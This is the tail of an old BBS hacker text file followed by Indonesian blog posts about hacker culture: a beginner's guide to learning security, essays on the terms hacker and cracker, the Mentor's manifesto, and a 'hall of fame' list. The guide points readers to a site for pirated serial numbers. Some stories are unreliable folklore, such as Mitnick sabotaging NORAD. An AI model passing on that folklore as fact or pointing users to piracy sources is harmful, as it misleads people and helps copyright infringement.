6) Reality Hackers Magazine c/o High Frontiers, P.O. Box 40271, Berkeley,
California, 94704, 415-995-2606
7) Any of the Phrack Inc. Newsletters & LOD/H Technical Journals you can find.

Acknowledgements:
Thanks to my wife for putting up with me.
Thanks to Lone Wolf for the RSTS & TOPS assistance.
Thanks to Android Pope for proofreading, suggestions, and beer.
Thanks to The Urvile/Necron 99 for proofreading & Cyber info.
Thanks to Eric Bloodaxe for wading through all the trash.
Thanks to the users of Phoenix Project for their contributions.
Thanks to Altos Computer Systems, Munich, for the chat system.
Thanks to the various security personel who were willing to talk to
me about how they operate.

Boards:
I can be reached on the following systems with some regularity-
The Phoenix Project: 512/441-3088 300-2400 baud
Hacker's Den-80: 718/358-9209 300-1200 baud
Smash Palace South: 512/478-6747 300-2400 baud
Smash Palace North: 612/633-0509 300-2400 baud

************************************* EOF **************************************

X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
Another file downloaded from: The NIRVANAnet(tm) Seven

& the Temple of the Screaming Electron Taipan Enigma 510/935-5845
Burn This Flag Zardoz 408/363-9766
realitycheck Poindexter Fortran 510/527-1662
Lies Unlimited Mick Freen 801/278-2699
The New Dork Sublime Biffnix 415/864-DORK
The Shrine Rif Raf 206/794-6674
Planet Mirth Simon Jester 510/786-6560

"Raw Data for Raw Nerves"
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

yang BAIK

2008-06-07T04:19:00.001-07:00

Ajari saya bagaimana menjadi Hacker yang baik
Menjadi hacker mungkin adalah salah satu cita-cita orang belajar komputer dan internet. Tetapi apa sebenarnya hacking, dan apa saja yang harus dilakukan untuk menjadi seorang hacker yang baik. Tulisan berikut akan memberikan petunjuk langkah per langkah bagaimana anda belajar. Petunjuk ini cocok juga untuk pemakai internet awal untuk bagaimana mencari informasi di Internet, mencari serial number, membaca artikel security serta tata cara bertanya yang baik disuatu forum diskusi.

Setelah membaca artikel ini walaupun anda membatalkan cita-cita anda, menimal anda telah mengerti pekerjaan berat apa yang harus dilakukan oleh seorang yang ingin menjadi hacker.

Akhirnya selamat membaca.

Salam,

Hendra & Susan Dewichan

--------------------------------------------------------------------------------

The Newbies Guide to the Internet
Originally written on: 7/1/01 revised: 13/1/01
by Clayman

--------------------------------------------------------------------------------
Untuk siapa saja tulisan ini

Tulisan ini ditujukan untuk siapa saja yang tertarik dengan hacking, atau ingin tahu apa yang dimaksud dengan hacking, dan juga bermanfaat bagi siapa saja yang ingin menambah wawasannya tentang komputer dan internet.Petunjuk ini ditujukan untuk tingkat pemula.

Tolong Beritahukan kepada saya bagaimana menjadi seorang hacker

Oh... tidak. Saya rasa anda terlalu banyak nonton film, atau salah pengertian tentang internet, dan berpikiran bahwa melakukan hacking adalah sangat menarik dan saya rasa hal tersebut adalah wajar saja. Kemudian, anda akan bertanya "Ajari saya bagaimana melakukan hack" atau "Bagaimana saya dapat melakukan hack terhadap situs ini". Anda adalah seorang yang panas-panas tahi ayam dan pasti akan diabaikan, dan semua orang akan memanggil anda sebagai lamer, dll ... dan hal ini juga hal yang wajar saja.

Jadi, moral dari cerita tersebut adalah : Sebelum anda bertanya "bagaimana saya dapat menjadi seorang hacker" adalah anda harus mengetahui pekerjaan berat apa yang harus anda lakukan, apa yang dimaksud dengan hacking, dll. Jadi petunjuk ini adalah langkah-langkah yang akan mengajari anda begaimana untuk belajar akan hal tersebut.
Baiklah, tetapi saya tidak mengerti.. apakah itu lamer dan newbie ?

Secara definisi tidak ada. Oleh karena itu adalah dua kata yang berbeda untuk mereka. Anda bingung tentang siapa itu newbie, lamer atau apa artinya "elite", "warez d00d", "script-kiddie" dan "wanna-be"? Mungkin anda tentu saja tidak mengerti apa yang anda baca . Tulisan ini akan menjelaskan hal ini apa ini dan apa itu:

* The Jargon File: http://www.tuxedo.org/~esr/jargon/jargon.html
* Hacker Stages: http://www.elfqrin.com/docs/HackerStages.html

Uhm.. mengapa mereka mengabaikan saya?

Pelajaran 1: Sebelum melakukan posting ke forum tertentu, baca dahulu aturan dan faq forum dari tersebut. Mengapa anda harus? Baiklah, sebagaimana anda ketahui, FAQ adalah singkatan dari frequently asked questions (pertanyaan-pertanyaan yang sering ditanyakan), dan mereka telah bosan akan hal tersebut, kemudian mereka meletakan jawaban di FAQ. Percaya atau tidak, pertanyaan seperti "ajari saya memasuki account hotmail pacar saya" adalah pertanyaan yang paling sering di tanyakan. Maka, jika anda tidak membaca faq, bukan saja anda yang kelihatan seperti idiot, tetapi anda juga menghabiskan waktu orang lain .. maka:

Aturan 1: Baca aturan pada forum. baca FAQ pada forum. Baca dua kali.

Aturan 2: Setelah benar-benar membaca aturan 1, jangan lihat yang lain dekat caps lock.

Ini juga petunjuk yang baik tentang "bagaimana melakukan posting supaya tidak diabaikan" ditulis oleh Raven, baca di www.securitywriters.org

Jadi, bagaimana kira-kira saya mendapatkan jawaban tersebut

Uhmm.. setiap orang tahu tentang yahoo.com, dan hampir setiap orang tahu tentang altavista.com. Jadi internet merupakan suatu jaringan yang sangat BESAR, maka orang menganggap usaha mencari menjadi sesuatu yang penting, sehingga mereka membuat suatu yang disebut dengan SEARCH ENGINES. Jadi, haruskah anda mencari jawan pertanyaan anda sendiri ? Ya anda harus melakukannya. Adalah sangat mungkin pertanyaan yang sama pernah ditanyakan orang lain, dan telah pula dijawab oleh yang lain, jadi gunakanlah search engine untuk pertanyaan seperti "Belajar C++". Masuk ke google.com, ketik pada kotak pencarian "Belajar C++". Sebelum belajar bagaimana melakukan pemrograman, anda mesti tahu untuk apa bahasa pemrograman tersebut, jadi carilah "What is C++". Perhatikan point-point yang ada? Sehingga Anda tidak menyebabkan orang lain melakukan hal yang sama berulang-ulang, melainkan mencari jawaban untuk diri sendiri. Ini merupakan praktek yang baik, jadi anda tidak perlu mencari orang yang dapat menjawab pertanyaan anda, karena sudah pernah ada di Internet, dan anda tinggal mencarinya.

Aturan 3: Gunakan search engine (google.com)
Aturan 4: Gunakan directori (dmoz.org, yahoo.com)

Tetapi situs tersebut tidak memenuhi keinginan saya?

Hmm.. Jika anda mencari search engine yang baik tentang security

* http://astalavista.box.sk

atau security portal yang baik

* http://neworder.box.sk
* http://securityfocus.com
* http://packetstorm.securify.com

Hmm.. Saya tidak suka membaca. Apakah ada saran lain?

Tidak ada. Anda harus banyak membaca. Hal ini adalah keharusan, karena: membaca = ilmu pengetahuan, ilmu pengetahuan = pengertian dan kebijaksanaan. Anda perlu pengertian dan kebijaksanaan untuk menjadi seorang hacker. Sederhananya, jika anda tidak suka membaca, hentikan membaca ini sekarang juga.

Jadi, apa yang anda rekomendasikan saya untuk dibaca?

Saya merekomendasikan anda membaca segala sesuatu yang anda temukan.

* http://neworder.box.sk
* http://blacksun.box.sk
* http://www.securitywriters.org
* http://www.phrack.com
* http://www.elfqrin.com/hack
* http://www.attrition.org --- tulisan ini sangat "panjang*

Uhh.. Siapa itu seorang hacker ? Apa itu hacking?

Ohh, mudah.

* Baca essay "Being Hacker" dan "Open Letter to a wannabe hacker" oleh Elf Qrin dari hacking lab essays
* Baca "The Hacker How-to" oleh Eric S. Raymond dari tuxedo.

Sangat menarik, ajari saya bagaimana melakukan hack

Baca hacking faq yang ada disana .. anda tidak membaca url yang telah saya berikan sebelumnya bukan ? Ketika anda mengerti bahwa pertanyaan ini tidak *berarti* banggalah atas diri anda. Jika anda masih melakukan post pertanyaan ini, baca dari awal petunjuk ini.

Bagaimana saya belajar programming?

Anda dapat membaca pada

* http://code.box.sk

untuk mendapatkan ide yang jelas tentang setiap bahasa. Jangan lupa untuk memeriksa tutorial dari "situs lain". Perlu diketahui bahwa, cara mendownload source-code dan melakukan kompilasi copy/paste TIDAK mengajari anda apa-apa... Jika anda rasa susah mencari source code, pergi ke:

* http://www.sourceforge.net

hal ini akan membuat anda sibuk sesaat.

Ahem, Saya menanyakan serial number dan tidak ada yang menjawab..

Hal ini tidak ada kaitannya dengan security. Ini adalah alasannya, dan anda tidak membaca aturan forum. Memakai software bajakan adalah ilegal, tetapi jika anda ingin memakainya, jangan tanyakan hal tersebut pada forum 'umum', jadi cari www.astalavista.com.

Anda punya saran?

Tentu saja.

+ Jangan menjawab kepada orang yang panas-panas tahi ayam karena hanya membuang waktu anda dan mereka.
+ Jangan membuang waktu dengan membaca pesan pada setiap forum. Bacalah beberapa yang berguna saja seperti Slashdot.org
+ Gunakan web board atau irc sebagai pilihan terakhir untuk mendapatkan informasi.
+ Jangan mengunakan scripts / program kecuali anda tahu apa yang anda lakukan.
+ Jangan mengikuti arus, seperti:

* Jangan katakan produk Microsoft tidak baik kecuali anda telah siap untuk menjawab pertanyaan "Mengapa Visual C++ lebih buruk dibandingkan dengan Borland C++ builder?"

* Jangan katakan "Linux lebih baik" jika anda tidak bisa menjawab "mengapa linux lebih baik" disamping open-source, lebih stabil, cepat, dan aman, serta kelihatan lucu.

* Jangan katakan "Menggunakan GUI tidak lebih baik, gunakan saja command line". Mengetik dengan command tidak membuat l33t. lebih cepat dari pada gui.

* Jangan berkata "Ini [program / cara / script / situs / atau yang lainnya ] lebih baik " tanpa mencoba yang lain. Bagaimana anda tahu sesuatu lebih baik tanpa mencoba setiap pilihan?

Jangan percaya setiap yang anda baca. Jangan merusak situs web orang lain. Bagaimana perasaan anda jika seseorang bermain-main dengan meletakkan gambar porno sebagai wall paper pada anak komputer anda perempuan anda yang berumur 6 tahun? atau jika hardisk yang berisi data penting anda terformat ?

Hmm, Saya tidak ada waktu...

Tidak ada masalah, menjadi pemakai biasa dapat juga bergembira. Bye bye.

Apakah anda seorang hacker?

Tidak.

Mengapa saya harus percaya sama anda?

Anda tidak perlu percaya sama saya .. atau semua orang yang tidak menanyakan hal tersebut. Jika anda merasa yang anda baca masuk akal, gunakan, jika tidak hanya untuk mengetahuinya.

--------------------------------------------------------------------------------

Dibuat oleh hendra@indoprog.com
Medan - Sumatera Utara
Indonesia

"Hacker, Riwayatmu Kini....."

2008-06-07T04:18:00.000-07:00

=========
Pernah suatu ketika pada tanggal 10 Agustus 2001 sebuah media massa online memberitakan mengenai hacker yang membobol dan men-deface (mengubah content maupun layout) beberapa situs di Internet dan memasang foto Tommy Soeharto di situs tersebut. Menurut media massa tersebut, aksi hacker tersebut adalah merupakan bantuan untuk menyebarluaskan dan menangkap Tommy Soeharto. Pada halaman yang di-deface tersebut, tertulis juga pesan "Hacked and deface not only a crime. This person is #1 criminal in our country".

Kemudian belum lama berselang, tepatnya pada tanggal 16 Agustus 2001, beberapa perusahaan dotcom menyelenggarakan sebuah acara bertajuk HackersNight, di sebuah café di bilangan Jakarta Selatan. Acara HackersNight tersebut merupakan acara bulanan yang sudah mencapai putaran ke 12 di Jakarta. Acara party-party ala pebisnis dotcom tersebut juga dilangsungkan di Bandung dan Surabaya, dan sudah tentu dilaksanakan di sebuah café pula. Acara yang dilangsungkan hingga larut malam tersebut banyak menyajikan aneka hiburan, musik yang keras dan setumpuk hadiah dari para sponsor.

Bagi orang awam, kedua informasi tersebut tidaklah menunjukkan kejanggalan apapun. Toh memang akhirnya terminologi hacker bagi orang awam tidak mempunyai banyak arti dan tidak berpengaruh banyak dalam kehidupan sehari-hari mereka. Tetapi bagi pelaku dan pemain industri teknologi informasi (TI), atau setidaknya bagi pemerhati dan pecinta TI, penggunaan kata hacker untuk dua contoh kasus tersebut di atas bisa menjadi suatu diskusi yang panjang. Ada pertanyaan yang paling mendasar: "Sudah tepatkah penggunaan kata hacker tersebut?" Untuk menjawab pertanyaan tersebut, ada baiknya kita memahami terminologi hacker tersebut lebih jauh.

==================================
Sejarah Singkat Terminologi Hacker
==================================
Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama.

Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos.

1 dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan. Pada tahun yang sama keluar pula sebuah film berjudul War Games yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengkontrol persenjataan nuklir AS.

Kemudian pada tahun 1995 keluarlah film berjudul Hackers, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan bagaimana akhirnya anak-anak muda tersebut mampu menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Salah satu pemainnya adalah Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.

Pada tahun yang sama keluar pula film berjudul The Net yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang. Dengan keluarnya dua film tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT.

==============================
Manifesto dan Kode Etik Hacker
==============================
Sebenarnya hacker memiliki manifesto dan kode etik yang menjadi patokan bagi hacker di seluruh dunia. Manifesto Hacker dibuat oleh seorang hacker yang menggunakan nickname The Mentor dan pertama kali dimuat pada majalah Phrack (volume 1 / issue 7 / 25 September 1986).

Manifesto Hacker tersebut adalah:

- Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.
- Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.
- Kami menjelajah, dan kalian sebut kami kriminal.
- Kami mengejar pengetahuan, dan kalian sebut kami kriminal.
- Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.
- Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.
- Ya, aku memang seorang kriminal.
- Kejahatanku adalah rasa keingintahuanku.
- Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.
- Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan.
- Aku memang seorang hacker, dan inilah manifesto saya.
- Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
- Bagaimanapun juga, kami semua senasib seperjuangan.

Hacker juga memiliki kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984.

Kode etik hacker tersebut tertulis:

1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali
2. Segala informasi haruslah gratis
3. Jangan percaya pada otoritas, promosikanlah desentralisasi
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.

==================
Hacker dan Cracker
==================
Sebenarnya secara lebih spesifik terminologi hacker telah dijelaskan dalam buku Hacker Attack karya Richard Mansfield tahun 2000. Menurut Mansfield, hacker didefinisikan sebagai seseorang yang memiliki keinginan untuk melakukan eksplorasi dan penetrasi terhadap sebuah sistem operasi dan kode komputer pengaman lainnya, tetapi tidak melakukan tindakan pengrusakan apapun, tidak mencuri uang atau informasi. Sedangkan cracker adalah sisi gelap dari hacker dan memiliki kertertarikan untuk mencuri informasi, melakukan berbagai macam kerusakan dan sesekali waktu juga melumpuhkan keseluruhan sistem komputer.

Perbedaan terminologi antar hacker dan cracker tersebut kini menjadi bias dan cenderung hilang sama sekali dalam perspektif media massa dan di masyarakat umum. Ada beberapa faktor penyebab hal tersebut:

- Para cracker tidak jarang menyebut diri mereka sebagai hacker
- Manifesto dan kode etik para hacker kerap pula dianggap sebagai manifesto dan kode etik bagi para cracker.
- Media massa menggunakan terminologi hacker secara salah kaprah dan hantam kromo
- Industri film mengangkat kehidupan hacker dari kacamata Hollywood
- Masyarakat melabelisasi kegiatannya menggunakan kata hacker agar lebih memiliki daya jual

Berdasarkan beberapa kondisi tersebut di atas, maka terminologi hacker memiliki pelebaran makna sedemikian rupa, sehingga kesalah-kaprahan kian hari kian menjadi-jadi. Setiap perilaku negatif yang dilakukan di Internet sering kali dikaitkan dengan istilah hacker, baik oleh media massa maupun masyarakat umum. Contohnya adalah pada paragraf pertama dan kedua tulisan ini. Perilaku men-defaced suatu situs nyata-nyata bukanlah modus operandi hacker. Hacker sejatinya tidak memiliki niatan atau tindakan yang sifatnya merusak.

Penggunaan kata hacker untuk sebuah acara party-party di café seperti contoh di atas juga merupakan satu bentuk pengaburan makna hacker yang sebenarnya. Acara HackersNight yang selalu digelar di café-café tersebut hanyalah merupakan ajang kumpul-kumpul pebisnis dotcom untuk bertukar kartu nama, menikmati hiburan dan bercengkerama hingga larut malam. Agak sulit jika ingin memperkirakan bahwa hacker yang sebenarnya akan menghadiri acara tersebut. Karena sejatinya seorang hacker kurang mau jati dirinya terekspos.

Berbeda bila kita berbicara mengenai ajang pertemuan hacker terbesar di dunia, Def Con, yang diadakan setahun sekali setiap pertengahan bulan Juli di Las Vegas. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktifitas hacking. Para hacker dari seluruh dunia tidak segan-segan untuk muncul setahun sekali dalam Def Con tersebut karena disitulah mereka dapat merasakan berada di komunitas hacker yang sesungguhnya, bukan sekedar labelisasi saja.

Walhasil, melihat beberapa kondisi di atas, akhirnya mau tidak mau terjadi kompromi dalam penggunaan istilah hacker. Sebagian orang ada memilih istilah hacker dan cracker, ada yang lebih nyaman menggunakan istilah hacker putih dan hacker hitam dan ada pula yang tetap menggunakan kata hacker untuk semua perilaku kriminalitas di Internet. Karena hacker yang sejati lebih banyak diam, cracker sering menyatakan dirinya sebagai hacker dan masyarakat umum lebih familiar dengan istilah hacker, akhirnya mau tidak mau media massa harus mengikuti selera pasar dengan ikut-ikutan mengeneralisir terminologi hacker.

== HACKER HALL OF FAME ==

2008-06-07T04:17:00.002-07:00

Koleksi profile hacker terbaik dunia.

Seleksi alam yang terjadi dalam dunia hacker telah menyisihkan
beberapa yang tidak mampu beradaptasi. Beberapa diantara mereka
beralih profesi atau mulai melakukan sesuatu yang berbeda dari
filosofi hacking.

Mereka yang mampu bertahan menggoreskan namanya sebagai seorang
demigod, seorang elite yang mengabdi kepada budaya hacker. Memang
tidak layak membanding-bandingkan kemampuan seorang hacker - dan semua
individu -. Tidak-lah etis untuk menilai sesuatu secara universal,
masing-masing substansi punya keunikan tersendiri. Dan uranium yang
berpendar ketika gelap. Namun selalu ada causa prima, dan emas akan
berbinar layaknya emas, walaupun didalam lumpur.

Dalam hal ini tidak ada perbandingan mutlak terhadap kehebatan seorang
hacker. Hall of fame disini hanyalah kumpulan hacker-hacker yang telah
mengabdi dan dikenal oleh masyarakat hacker secara umum.

1. Richard Stallman

Handle: tidak ada (tidak ada yang harus disembunyikan)

Salah seorang 'Old School Hacker', bekerja pada lab Artificial
Intelligence MIT. Merasa terganggu oleh software komersial dan dan
hak cipta pribadi. Akhirnya mendirikan GNU (baca: guhNew) yang
merupakan singkatan dari GNU NOT UNIX.

Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York
Scintific Center saat berumur 16 tahun.

2. Dennis Ritchie dan Ken Thomson

Handle: dmr dan ken

Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson
menulis sistem operasi UNIX yang elegan.

3. John Draper

Handle: Cap'n Crunch

Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang
merupakan hadiah dari kotak sereal. Merupakan pelopor penggunaan
nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca:
frieker)

Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan
telepon gratis. Pada pengembangannya, nada 2600 Hz tidak lagi
dibuat dengan peluit plastik, melainkan menggunakan alat yang
disebut 'Blue Box'.

4. Mark Abene

Handle: Phiber Optik

Sebagai salah seorang 'Master of Deception' phiber optik
menginspirasikan ribuan remaja untuk mempelajari sistem internal
telepon negara. Phiber optik juga dinobatkan sebagai salah
seorang dari 100 orang jenius oleh New York Magazine.

Menggunakan komputer Apple ][, Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris

Handle: rtm

Seorang anak dari ilmuwan National Computer Security Center -
merupakan bagian dari National Security Agencies (NSA) -. Pertama
sekali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Kevin Mitnick

Handle: Condor

Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster 'FBI Most Wanted'.

Kevin juga seorang 'Master of Deception' dan telah menulis buku
yang berjudul 'The Art of Deception'. Buku ini menjelaskan berbagai
teknik social engineering untuk mendapatkan akses ke dalam sistem.

7. Kevin Poulsen

Handle: Dark Dante

Melakukan penipuan digital terhadap stasiun radio KIIS-FM,
memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche
944 S2.

8. Johan Helsingius

Handle: julf

Mengoperasikan anonymous remailer paling populer didunia.

9. Vladimir Levin

Handle: tidak diketahui

Lulusan St. Petersburg Tekhnologichesky University. Menipu komputer
CitiBank dan meraup keuntungan 10 juta dollar. Ditangkap Interpol
di Heathrow Airport pada tahun 1995

10. Steve Wozniak

Handle: ?

Membangun komputer Apple dan menggunakan 'blue box' untuk
kepentingan sendiri.

11. Tsutomu Shimomura

Handle: ?

Berhasil menangkap jejak Kevin Mitnick.

12. Linus Torvalds

Handle: ?

Seorang hacker sejati, mengembangkan sistem operasi Linux yang
merupakan gabungan dari 'LINUS MINIX'. Sistem operasi Linux telah
menjadi sistem operasi 'standar' hacker. Bersama Richard Stallman
dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan
programmer, developper dan hacker seluruh dunia untuk
mengembangkan kernel Linux.

13. Eric Steven Raymond

Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: 'How To
Become A Hacker' dan 'The new hacker's Dictionary'. Begitu
fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.

Menurut Eric, "dunia mempunyai banyak persoalan menarik dan
menanti untuk dipecahkan."

14. Ian Murphy

Handle: Captain Zap

Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam
komputer AT&T dan menggubah seting jam internal-nya. Hal ini
mengakibatkan masyarakat pengguna telfon mendapatkan diskon
'tengah malam' pada saat sore hari, dan yang telah menunggu hingga
tengah malam harus membayar dengan tagihan yang tinggi.

rev:
[1] http://tlc.discovery.com/convergence/hackers/bio/bio_01.html

EOF.

Greetz: Echo Staff
Y3DIPS, The_Day, COMEX, z3r0byt3

Indonesia security industries.

Phriends: IPA 4, SMU 3 P##A## <-- Uh ...

Girls: Rizka, Nike, Kiking, Silvia, Nadya, Yanti, terlalu
banyak untuk disebutkan.

Credits: Internet, E-zine, whitepaper, Media Indonesia, Indomilk +
Milo, Teh, Rokok Sampoerna International.

Hacker & Cracker Pahlawan versus Penjahat

2008-06-07T04:17:00.001-07:00

Hacker & Cracker

Pahlawan versus Penjahat

Masih ingat Kevin Mitnick ? Sosok tinggi dan ceking yang pernah menggegerkan dunia cyber itu oleh para hacker di seantero jaringan dianggap sebagai orang nomor satu penjahat jaringan. Bagaimana tidak, disamping telah mencuri data yang bernilai miliaran dollar AS melalui jaringan Internet, dia juga diduga telah menyabot sistem komputer NORA.D (Komando Pertahanan Amerika Utara) yang mengawasi rudal - rudal Rusia dan mengarahkan sistem rudal AS serta pesawat - pesawat pembom AS di seluruh dunia. Seperti yang diberitakan, akhirnya ia berhasil ditangkap setelah diburu selama 3 tahun (1993 - 1995) oleh para agen Federal dan sekelompok pakar komputer dibawah pimpinan pakar fisika komputasi di San Diego Computing Centre, Tsutomu Shomomura.

Setahun kemudian, tepatnya 1996 dinas rahasia AS yang sudah kondang, CIA tak lupu dari serangan para hacker. CIA dipermalukan oleh para hacker itu dengan mengganti singkatan CIA yang terpampang dalam website lembaga rahasia ini sehingga berbunyi "Central Stupidity Agency".

Aktifitas hacker tidak berhenti sampai di situ. Februari 2000 situs - situs besar AS seperti Yahoo!, Amazon.com dan beberapa lainnya mengaku mendapat amukan para hacker. 19 Mei 2000 Senator Partai Republik dari Maine, Susan M. Collins mengisahkan bagaimana identitas dirinya dipalsukan orang lain untuk tujuan - tujuan yang tidak benar di dunia maya, dan data - data itu di duga dicuri para hacker dari jaringan internet. Lebih mengejutkan lagi, Departemen Pertahanan AS, Pentagon, mengaku menerima gangguan hacker 250.000 kali setiap tahunnya.

Di Indonesia, aktifitas hacker muncul bersamaan dengan tertangkapnya Wenas (16), bocah belia asal Malang yang melakukan pembobolan sebuah server di Singapura. Ia ditangkap oleh polisi setempat dan baru tanggal 28 Agustus 2000 yang lalu Wenas di jatuhi hukuman denda Rp 150 Juta oleh pengadilan negeri Singapura.

Melihat tingkah polah tokoh kita yang tenar dengan istilah hacker ini seakan dunia sedang dilanda ketakutan besar - besaran, khususnya di dunia perbankan dan jaringan (internet). Apalagi pernah menjadi seorang bocah yang nyaris meluncurkan nuklir - nuklir AS karena kebetulan ketika mainn game di Internet kode - kode game yang ia gunakan mirip dengan kode - kode nuklir tersebut. Tidak bisa dibayangkan bagaimana jika nuklir itu betul - betul meluncur....!!!!

Disamping aktifitas hacker mengancam kehidupan fisik seperti nuklir tadi, ia juga meresahkan seluruh penjuru jaringan, baik personal maupun institusi. Paling terasa dari ancaman itu adalah dunia commerce (perdagangan).

Hacker dan Cracker

Sebelum melangkah jauh menuju aktifitas kejahatan Net (jaringan), perlu anda ketahui terlebih dahulu, apa itu Hacker dan apa juga makhluk yang disebut Cracker itu.

Sementara itu banyak orang yang menganggap Hacker dan Cracker itu sama. Hal ini terjadi lantaran memang di beberapa sisi, Hacker dan Cracker memiliki kesamaan, misalnya, keduanya sama - sama programmer, aktifitasnya membobol/melakukan penyusupan - penyusupan ke jaringan orang melalui Internet, dan keduanya juga saling merahasiakan identitas, dan lain - lain.

Namun sebenarnya, antara Hacker dan Cracker adalah dua makhluk yang berlawanan. Ibaratnya, seorang Hacker adalah pahlawan, sedang Cracker menunjukkan sosok ala penjahat. Menurut I Made Wiryana pakar TI Gunadarma yang juga kandidat Doktor Universitas Bielefeld Jerman mengungkapkan bahwa yang dimaksud Cracker adalah orang yang memasuki sistem secara tidak sah dan melakukan berbagai aktifitas yang merugikan si empunya jaringan yang disusupi. Sedang Hacker adalah orang suka utak - atik jaringan komputer (internet) untuk mencapai kepuasan, pengetahuan teknik. Misalnya Richard Stallman dan Linus Torvalds itu adalah seorang hacker bukan cracker. Begitu juga Bill Gates -pendiri Microsoft -dulu juga seorang hacker.

Akan tetapi memang, tidak semua orang yang beroperasi masuk ke dalam sistem jaringan atau komputer dapat dicap sebagai Cracker. Sebab, hacker pun bekerja seperti itu, tetapi yang membedakan adalah tujuannya. Aktifitas hacker menurut I Made Wiryana bertujuan untuk pencapaian pengetahuan teknis. Hacker bekerja ala Robin Hood, yaitu masuk untuk mencari kelemahan sekuriti dan memperbaikinya, atau paling tidak menunjukkan kepada pemiliknya tentang kelemahan yang harus segera diperbaiki, sebagaimana dijelaskan panjang lebar oleh Stever Levy dalam bukunya tentang hacker.

Sebab tujuan yang berbeda itulah, maka karakter perilakunya pun berbeda, ungkap I Made. Hacker telah memiliki kode etik yang mereka pegang dengan teguh. Hacker sejati akan selalu bertindak berlandaskan kode etik yang walau tidak tertulis tetapi begitu dijunjung tinggi. Salah satu kelompok hacker yang masih memegang teguh etika ini adalah Computer Chaos Clup (CCC) yang didirikan sejak tahun 1980-an di Jerman. Mereka di kenal cukup ketat memegang etika hacker.

Rata - rata perusahaan bergerak di dunia jaringan global (internet) juga memiliki hacker. Tugasnya jelas, yakni menjaga jaringan dari kemungkinan perusakan pihak luar "cracker", disamping itu juga berperan menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak - abrik jaringannya, sebagaimana perusahaan asuransi dan auditing "Price Waterhouse". Ia memiliki team hacker yang disebut dengan Tiger Team. Mereka bekerja untuk menguji sistem sekuriti client mereka.

Dengan definisi hacker yang begitu terpuji inilah ia layak mendapat pahlawan jaringan, sedang cracker sebagaimana yang telah digambarkan, ia melakukan pembobolan - pembobolan jaringan, mencuri data, menyalahgunakan identitas orang lain, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain. Maka, pantas bila cracker mendapat gelar penjahat jaringan.

